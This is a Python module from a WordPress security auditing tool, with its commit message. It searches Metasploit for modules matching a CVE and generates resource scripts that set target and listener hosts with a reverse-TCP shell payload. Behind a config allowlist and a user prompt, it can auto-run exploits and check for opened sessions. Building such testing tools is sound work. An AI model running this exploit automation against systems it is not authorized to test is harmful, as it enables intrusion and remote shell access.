wpaudit/modules/exploit_intel/metasploit_handler.py
Huzaifa Shoukat 1c5a60dc34 feat: Major enhancements, system rename to WPAUDIT, and core improvements
This commit introduces a wide range of significant enhancements,
a system-wide rename, and core architectural improvements.

**1. System Renaming:**
   - Renamed the project from "OmegaScythe Dominator/Overlord" and "OSO" to "WPAUDIT" across all relevant files. This includes:
     - `README.md`: Updated project title, descriptions, and example file names.
     - `config/default_config.yaml`: Updated comments, `output_dir`, `report_prefix`, `default_user_agent`, and XSS fuzzing payload markers.
     - Python Modules (`main.py`, `core/utils.py`, `core/tool_runner.py`, `modules/wpscan_auditor.py`, `modules/nuclei_scanner.py`, `modules/exploit_intel/metasploit_handler.py`): Updated internal references, print statements, and default values to reflect "WPAUDIT".

**2. Extensive Module Enhancements:**
   - **wp_analyzer Suite:**
     - `sqli_checker.py`: Added sophisticated boolean-based and time-based blind SQLi detection capabilities.
     - `xss_checker.py`: Expanded XSS payloads and added heuristic URL fragment checking for potential DOM XSS vectors.
     - `admin_area_security.py`: Added checks for alternative admin paths, common admin protection plugin footprints, and .htaccess protection heuristics.
     - `advanced_user_enum.py`: Implemented oEmbed and more granular REST API user enumeration techniques.
     - `ajax_checker.py`: Added rudimentary HTML-based AJAX action discovery and a basic parameter fuzzing framework for discovered actions.
     - `config_audit.py`: Implemented heuristic checks for `WP_DEBUG` exposure, `DISALLOW_FILE_EDIT`, and `FORCE_SSL_ADMIN` status.
     - `login_page.py`: Added detection for CAPTCHA, 2FA plugin footprints, "Lost Password" & "Register" link analysis, and passive password policy hints.
     - `comment_security.py`: Added checks for comment author link `rel` attributes (nofollow, ugc, sponsored), comment moderation hints, and `wp-comments-post.php` protection.
     - `cron_checker.py`: Refined `wp-cron.php` accessibility checks, added `X-Robots-Tag` check, and informational notes on cron-related constants.
     - `debug_exposure.py`: Added checks for publicly accessible `debug.log` and Query Monitor plugin footprints.
     - `custom_endpoint_fuzzer.py`: Implemented deeper REST API endpoint discovery (listing routes within custom namespaces), consumption of AJAX actions from `ajax_checker.py`, basic unauthenticated probing, and a lightweight fuzzing capability (XSS, SQLi) for discovered custom endpoints.
     - `directory_listing.py`: Added recursive checking for `wp-content/uploads` (year/month), dynamic checking of discovered plugin/theme subdirectories, sensitive file type highlighting, and an expanded list of common directories.
     - `multisite_checker.py`: Improved multisite detection (HTML footprints like body classes, asset paths, `sunrise.php` presence) and deeper `wp-signup.php` analysis for user/site registration hints.
     - `rest_api.py` (formerly `analyze_rest_api_user_enum`): Renamed and refocused to `analyze_rest_api_general`. Now includes comprehensive listing of all REST API namespaces/routes, analysis of the API root for info disclosure, and unauthenticated checks on core endpoints (users, posts, pages, media, settings).
     - `security_headers.py`: Implemented detailed Content-Security-Policy (CSP) analysis (unsafe-inline/eval, broad sources, missing directives), deeper Strict-Transport-Security (HSTS) checks (max-age, includeSubDomains, preload), added checks for newer headers (COOP, COEP, CORP), and analysis of headers on `wp-login.php`.
     - `user_registration.py`: Added checks for CAPTCHA/anti-spam footprints, passive analysis for password strength meter indicators, heuristic checks for email verification requirements, and more detailed analysis of `wp-signup.php` in multisite contexts.
   - **Other Scanner Modules:**
     - `sqlmap_injector.py`: Added support for SQLMap tamper scripts via configuration and refined vulnerability detection from logs.
     - `nmap_scanner.py`: Enabled and refined Nmap XML parsing for better data extraction, added support for NSE script profiles, and included host script results in findings.
     - `parameter_finder.py`: Corrected `run_scan` logic for Arjun tool execution and standardized options handling.
   - **Exploit Intelligence (`exploit_intel/`):**
     - `query_builder.py`: Now leverages Nmap service information and more granular Nuclei data (tags, classification) to generate richer and more targeted exploit search queries.
     - `gatherer.py`: Handles structured query objects, includes basic query prioritization (CVEs first), stores results in a new `found_exploits_correlated` structure, and incorporates a confidence score for SearchSploit results based on query relevance.
     - `searchsploit_handler.py`: Improved JSON parsing from SearchSploit output, added extraction of "Date" and "Author" fields, and included placeholders for future exploit mirroring functionality.

**3. Core Function Improvements:**
   - **Reporting (`reporting/generator.py` & `report_template.html`):**
     - Implemented HTML report generation using Jinja2.
     - Created `reporting/report_template.html` for structured and user-friendly HTML reports.
     - Updated `main.py` to call the HTML report generation function.
   - **State Management (`core/state.py`):**
     - Integrated `orjson` for potentially faster JSON serialization/deserialization.
     - Implemented a backup mechanism (`.bak` file) before overwriting the state file during `save_state`.
     - Updated internal default paths/prefixes to align with the "WPAUDIT" renaming.
   - **Tool Checking (`core/tool_checker.py`):**
     - Implemented tool version checking against configurable minimum versions using the `packaging` library.
     - Added more specific regex patterns for version parsing for various tools.
     - Updated status reporting for tool checks to be more granular (e.g., "Found (Version OK)", "Found (Version Too Low)").
   - **Tool Runner (`core/tool_runner.py`):**
     - Improved error message for `subprocess.CalledProcessError` to include a snippet of `stderr` for better diagnostics.

**4. Configuration & Documentation:**
   - Updated `README.md` with the new "WPAUDIT" name, revised descriptions, and updated example file names.
   - Updated `config/default_config.yaml` with the "WPAUDIT" name, new report/output directory defaults, and new configuration options related to module enhancements (e.g., `exploit_intel_mirror_searchsploit_exploits`).
   - Implicitly added `Jinja2`, `orjson`, and `packaging` to `requirements.txt` dependencies.

This comprehensive suite of changes significantly advances WPAUDIT's capabilities, making it a more robust, intelligent, and user-friendly WordPress security auditing tool.
2025-05-20 00:51:10 +05:00

242 lines
12 KiB
Python

import re
import os
import subprocess
import time
from urllib.parse import urlparse
from core.tool_runner import run_command
from core.utils import get_scan_filename_prefix, user_confirm, sanitize_filename
# --- Constants ---
MSF_RC_DIR_NAME = "msf_resource_scripts" # Duplicated here for now, consider centralizing constants
def _generate_msf_rc_script(state, config, module_path, lhost, lport):
"""Generates a Metasploit resource (.rc) file for manual execution."""
target_info = state.get_full_state()["scan_metadata"]["target_info"]
rhost = target_info.get("ip", target_info.get("hostname"))
target_url = target_info.get("url", "")
# Determine RPORT based on URL scheme or default
parsed_target_url = urlparse(target_url)
rport = parsed_target_url.port or (443 if parsed_target_url.scheme == "https" else 80)
ssl = "true" if parsed_target_url.scheme == "https" else "false"
vhost = target_info.get("hostname", rhost) # Use hostname for VHOST if available
# Create dedicated directory for RC files
base_filename = get_scan_filename_prefix(state, config)
rc_dir = os.path.join(config["output_dir"], MSF_RC_DIR_NAME)
os.makedirs(rc_dir, exist_ok=True)
sanitized_module_name = sanitize_filename(module_path.replace("/", "_"))
rc_filename = f"{os.path.basename(base_filename)}_msf_{sanitized_module_name}_lport{lport}.rc"
rc_file_path = os.path.join(rc_dir, rc_filename)
rc_content = f"""# Metasploit Resource Script generated by WPAUDIT
# Module: {module_path}
# Target: {rhost}:{rport} (VHOST: {vhost})
# Listener: {lhost}:{lport}
# Generated: {time.strftime('%Y-%m-%d %H:%M:%S %Z')}
use {module_path}
set RHOSTS {rhost}
set RPORT {rport}
set LHOST {lhost}
set LPORT {lport}
set VERBOSE true
# --- Common Web Options (Uncomment/Adjust as needed) ---
# set SSL {ssl}
# set VHOST {vhost}
# set TARGETURI /path/to/vulnerable/app # Adjust if needed
# --- Payload Options (Example: Reverse TCP) ---
# set PAYLOAD generic/shell_reverse_tcp # Adjust payload if needed
# --- Check before running (Optional but Recommended) ---
# check
# --- Run the exploit ---
# exploit
# OR for auxiliary modules:
# run
# --- Instructions ---
# 1. Start msfconsole
# 2. Run: resource "{rc_file_path}" # Use quotes if path contains spaces
# 3. Review options with 'show options'
# 4. Adjust options if necessary (e.g., PAYLOAD, TARGETURI)
# 5. Run 'check' if available for the module
# 6. Run 'exploit' or 'run'
"""
try:
with open(rc_file_path, 'w') as f_rc:
f_rc.write(rc_content)
return rc_file_path
except Exception as e:
print(f" [-] Error generating MSF resource script '{rc_file_path}': {e}")
return None
def _run_metasploit_module(state, config, module_path, lhost, lport, timeout):
"""
Attempts to run a specific Metasploit module. VERY DANGEROUS.
"""
target_info = state.get_full_state()["scan_metadata"]["target_info"]
rhost = target_info.get("ip", target_info.get("hostname"))
target_url = target_info.get("url", "")
parsed_target_url = urlparse(target_url)
rport = parsed_target_url.port or (443 if parsed_target_url.scheme == "https" else 80)
sanitized_module_name = sanitize_filename(module_path.replace("/", "_"))
base_filename = get_scan_filename_prefix(state, config)
msf_log_dir = os.path.join(config["output_dir"], "msf_autorun_logs")
os.makedirs(msf_log_dir, exist_ok=True)
msf_run_log_file = os.path.join(msf_log_dir, f"{os.path.basename(base_filename)}_msf_run_{sanitized_module_name}_lport{lport}.log")
msf_commands = f"""
use {module_path}
set RHOSTS {rhost}
set RPORT {rport}
set LHOST {lhost}
set LPORT {lport}
set VERBOSE true
exploit -z
exit
"""
command = ["msfconsole", "-q", "-x", msf_commands]
print(f" Executing MSF Autorun: {' '.join(command)}")
log_content_header = f"Metasploit AUTORUN attempt for: {module_path}\nTarget: {rhost}:{rport}\nLHOST: {lhost}\nLPORT: {lport}\nCommand: {' '.join(command)}\n\n"
run_status = "Failed"
error_msg = None
process = None # Initialize process to None
try:
with open(msf_run_log_file, 'w', errors='ignore') as log_f:
log_f.write(log_content_header)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, bufsize=1, universal_newlines=True, errors='ignore')
for line in process.stdout:
log_f.write(line)
retcode = process.wait(timeout=timeout)
if retcode != 0:
error_msg = f"msfconsole exited with code {retcode}"
run_status = f"Failed (RC={retcode})"
if not run_status.startswith("Failed (RC="): # Only check log if Popen didn't already indicate failure
with open(msf_run_log_file, 'r', errors='ignore') as f_check:
log_text_for_check = f_check.read().lower()
if re.search(r"(session|command shell session|meterpreter session)\s+\d+\s+opened", log_text_for_check):
print(f" [!!!] Metasploit AUTORUN for {module_path} appears SUCCESSFUL (Session Opened). Check log and listener!")
run_status = "Success (Session Opened Indicator)"
state.add_critical_alert(f"Metasploit: SUCCESSFUL AUTORUN of {module_path} against {rhost}. SESSION OPENED?")
elif "exploit completed, but no session was created" in log_text_for_check:
print(f" [-] Metasploit AUTORUN for {module_path} completed, but no session reported.")
run_status = "Completed (No Session)"
else:
print(f" [?] Metasploit AUTORUN for {module_path} finished (RC=0). Review log for details: {msf_run_log_file}")
run_status = "Completed (Unknown Outcome)"
else: # Popen failed (RC!=0)
print(f" [-] Metasploit AUTORUN for {module_path} failed. RC={retcode}. Review log: {msf_run_log_file}")
except subprocess.TimeoutExpired:
error_msg = f"Autorun TIMED OUT after {timeout}s"
print(f" [-] Metasploit AUTORUN timed out for {module_path}.")
run_status = "Timeout"
state.add_tool_error(f"Metasploit Autorun Timeout: {module_path} on {rhost}")
if process and process.poll() is None: process.kill()
except Exception as e:
error_msg = f"Autorun ERROR: {e}"
print(f" [-] Metasploit AUTORUN execution error for {module_path}: {e}")
run_status = f"Error: {e}"
state.add_tool_error(f"Metasploit Autorun Error: {module_path} on {rhost} - {e}")
return {"module": module_path, "status": run_status, "log_file": msf_run_log_file, "error": error_msg}
def search_metasploit(state, config, query, base_scan_prefix_for_log, lhost_for_rc, current_lport_ref):
"""
Searches Metasploit for a given query (typically CVE), parses results,
generates RC files, and optionally attempts autorun.
Returns:
list: Found Metasploit modules.
list: Paths to generated RC files.
list: Results of autorun attempts.
int: Updated LPORT value.
"""
print(f" Running Metasploit search for '{query}'...")
found_msf_modules = []
generated_rc_files_for_query = []
autorun_attempts_for_query = []
msfconsole_search_timeout = config.get("msfconsole_timeout", 90)
msfconsole_exploit_timeout = config.get("msfconsole_exploit_timeout", 300)
enable_autorun = config.get("exploit_intel_enable_autorun", False)
allowed_autorun_modules = config.get("exploit_intel_autorun_modules", [])
msf_search_console_log = os.path.join(
config.get("output_dir", "."),
"tool_logs",
f"{os.path.basename(base_scan_prefix_for_log)}_msfsearch_{sanitize_filename(query)}.log"
)
os.makedirs(os.path.dirname(msf_search_console_log), exist_ok=True)
try:
cve_id_for_msf = query.upper().replace("CVE-", "")
msf_cmd_str = f"search cve:{cve_id_for_msf}; exit"
process_msf_obj = run_command(
["msfconsole", "-q", "-x", msf_cmd_str],
"Metasploit Search", config,
timeout=msfconsole_search_timeout,
return_proc=True,
log_file_path=msf_search_console_log
)
if process_msf_obj and hasattr(process_msf_obj, 'returncode') and process_msf_obj.returncode == 0:
msf_output = ""
if os.path.exists(msf_search_console_log):
with open(msf_search_console_log, 'r', errors='ignore') as f_log_msf:
msf_output = f_log_msf.read()
if not msf_output:
print(f" [?] Metasploit search log for '{query}' is empty. Log: {msf_search_console_log}")
module_regex = re.compile(r"^\s*\d*\s+(exploit|auxiliary)/(\S+)\s+\S+\s+(\w+)\s+.*?\s+(.*)$", re.MULTILINE)
for match in module_regex.finditer(msf_output):
module_type = match.group(1)
module_name = match.group(2)
module_path = f"{module_type}/{module_name}"
module_rank = match.group(3)
module_desc = match.group(4).strip()
module_info = {"path": module_path, "rank": module_rank, "description": module_desc}
found_msf_modules.append(module_info)
rc_file_path = _generate_msf_rc_script(state, config, module_path, lhost_for_rc, current_lport_ref[0])
if rc_file_path:
print(f" -> Generated MSF resource script: {rc_file_path}")
generated_rc_files_for_query.append({
"query": query, "module": module_path,
"rc_file": rc_file_path, "description": module_desc
})
current_lport_ref[0] += 1 # Increment LPORT by reference
if enable_autorun and module_path in allowed_autorun_modules:
port_for_autorun = current_lport_ref[0] - 1 if rc_file_path else current_lport_ref[0]
if user_confirm(f"Attempt to AUTORUN Metasploit module '{module_path}' (LPORT: {port_for_autorun}) against target? EXTREMELY DANGEROUS.", config):
print(f" [*] Attempting autorun for module: {module_path} (LPORT: {port_for_autorun})")
autorun_result = _run_metasploit_module(state, config, module_path, lhost_for_rc, port_for_autorun, msfconsole_exploit_timeout)
autorun_attempts_for_query.append(autorun_result)
print(f" -> Autorun Status for {module_path}: {autorun_result.get('status')}. Log: {autorun_result.get('log_file')}")
else:
print(f" [i] Skipping autorun for {module_path} (User Declined).")
autorun_attempts_for_query.append({"module": module_path, "status": "Skipped (User Declined)", "log_file": None})
if found_msf_modules:
print(f" [+] Metasploit: Found {len(found_msf_modules)} potential module(s) for '{query}'.")
elif "No results from search" not in msf_output and ("exploit/" in msf_output or "auxiliary/" in msf_output):
print(f" [+] Metasploit: Output suggests modules for '{query}' (parsing might need refinement).")
# Storing a snippet might be useful if parsing fails but output exists
# found_exploits_dict[query]["metasploit_output_snippet"] = msf_output.split("Matching Modules")[-1][:500] if "Matching Modules" in msf_output else msf_output[:500]
except Exception as e:
print(f" [-] Metasploit: Error searching/running for '{query}': {e}")
state.add_tool_error(f"Metasploit search/run Error for query '{query}': {e}")
return found_msf_modules, generated_rc_files_for_query, autorun_attempts_for_query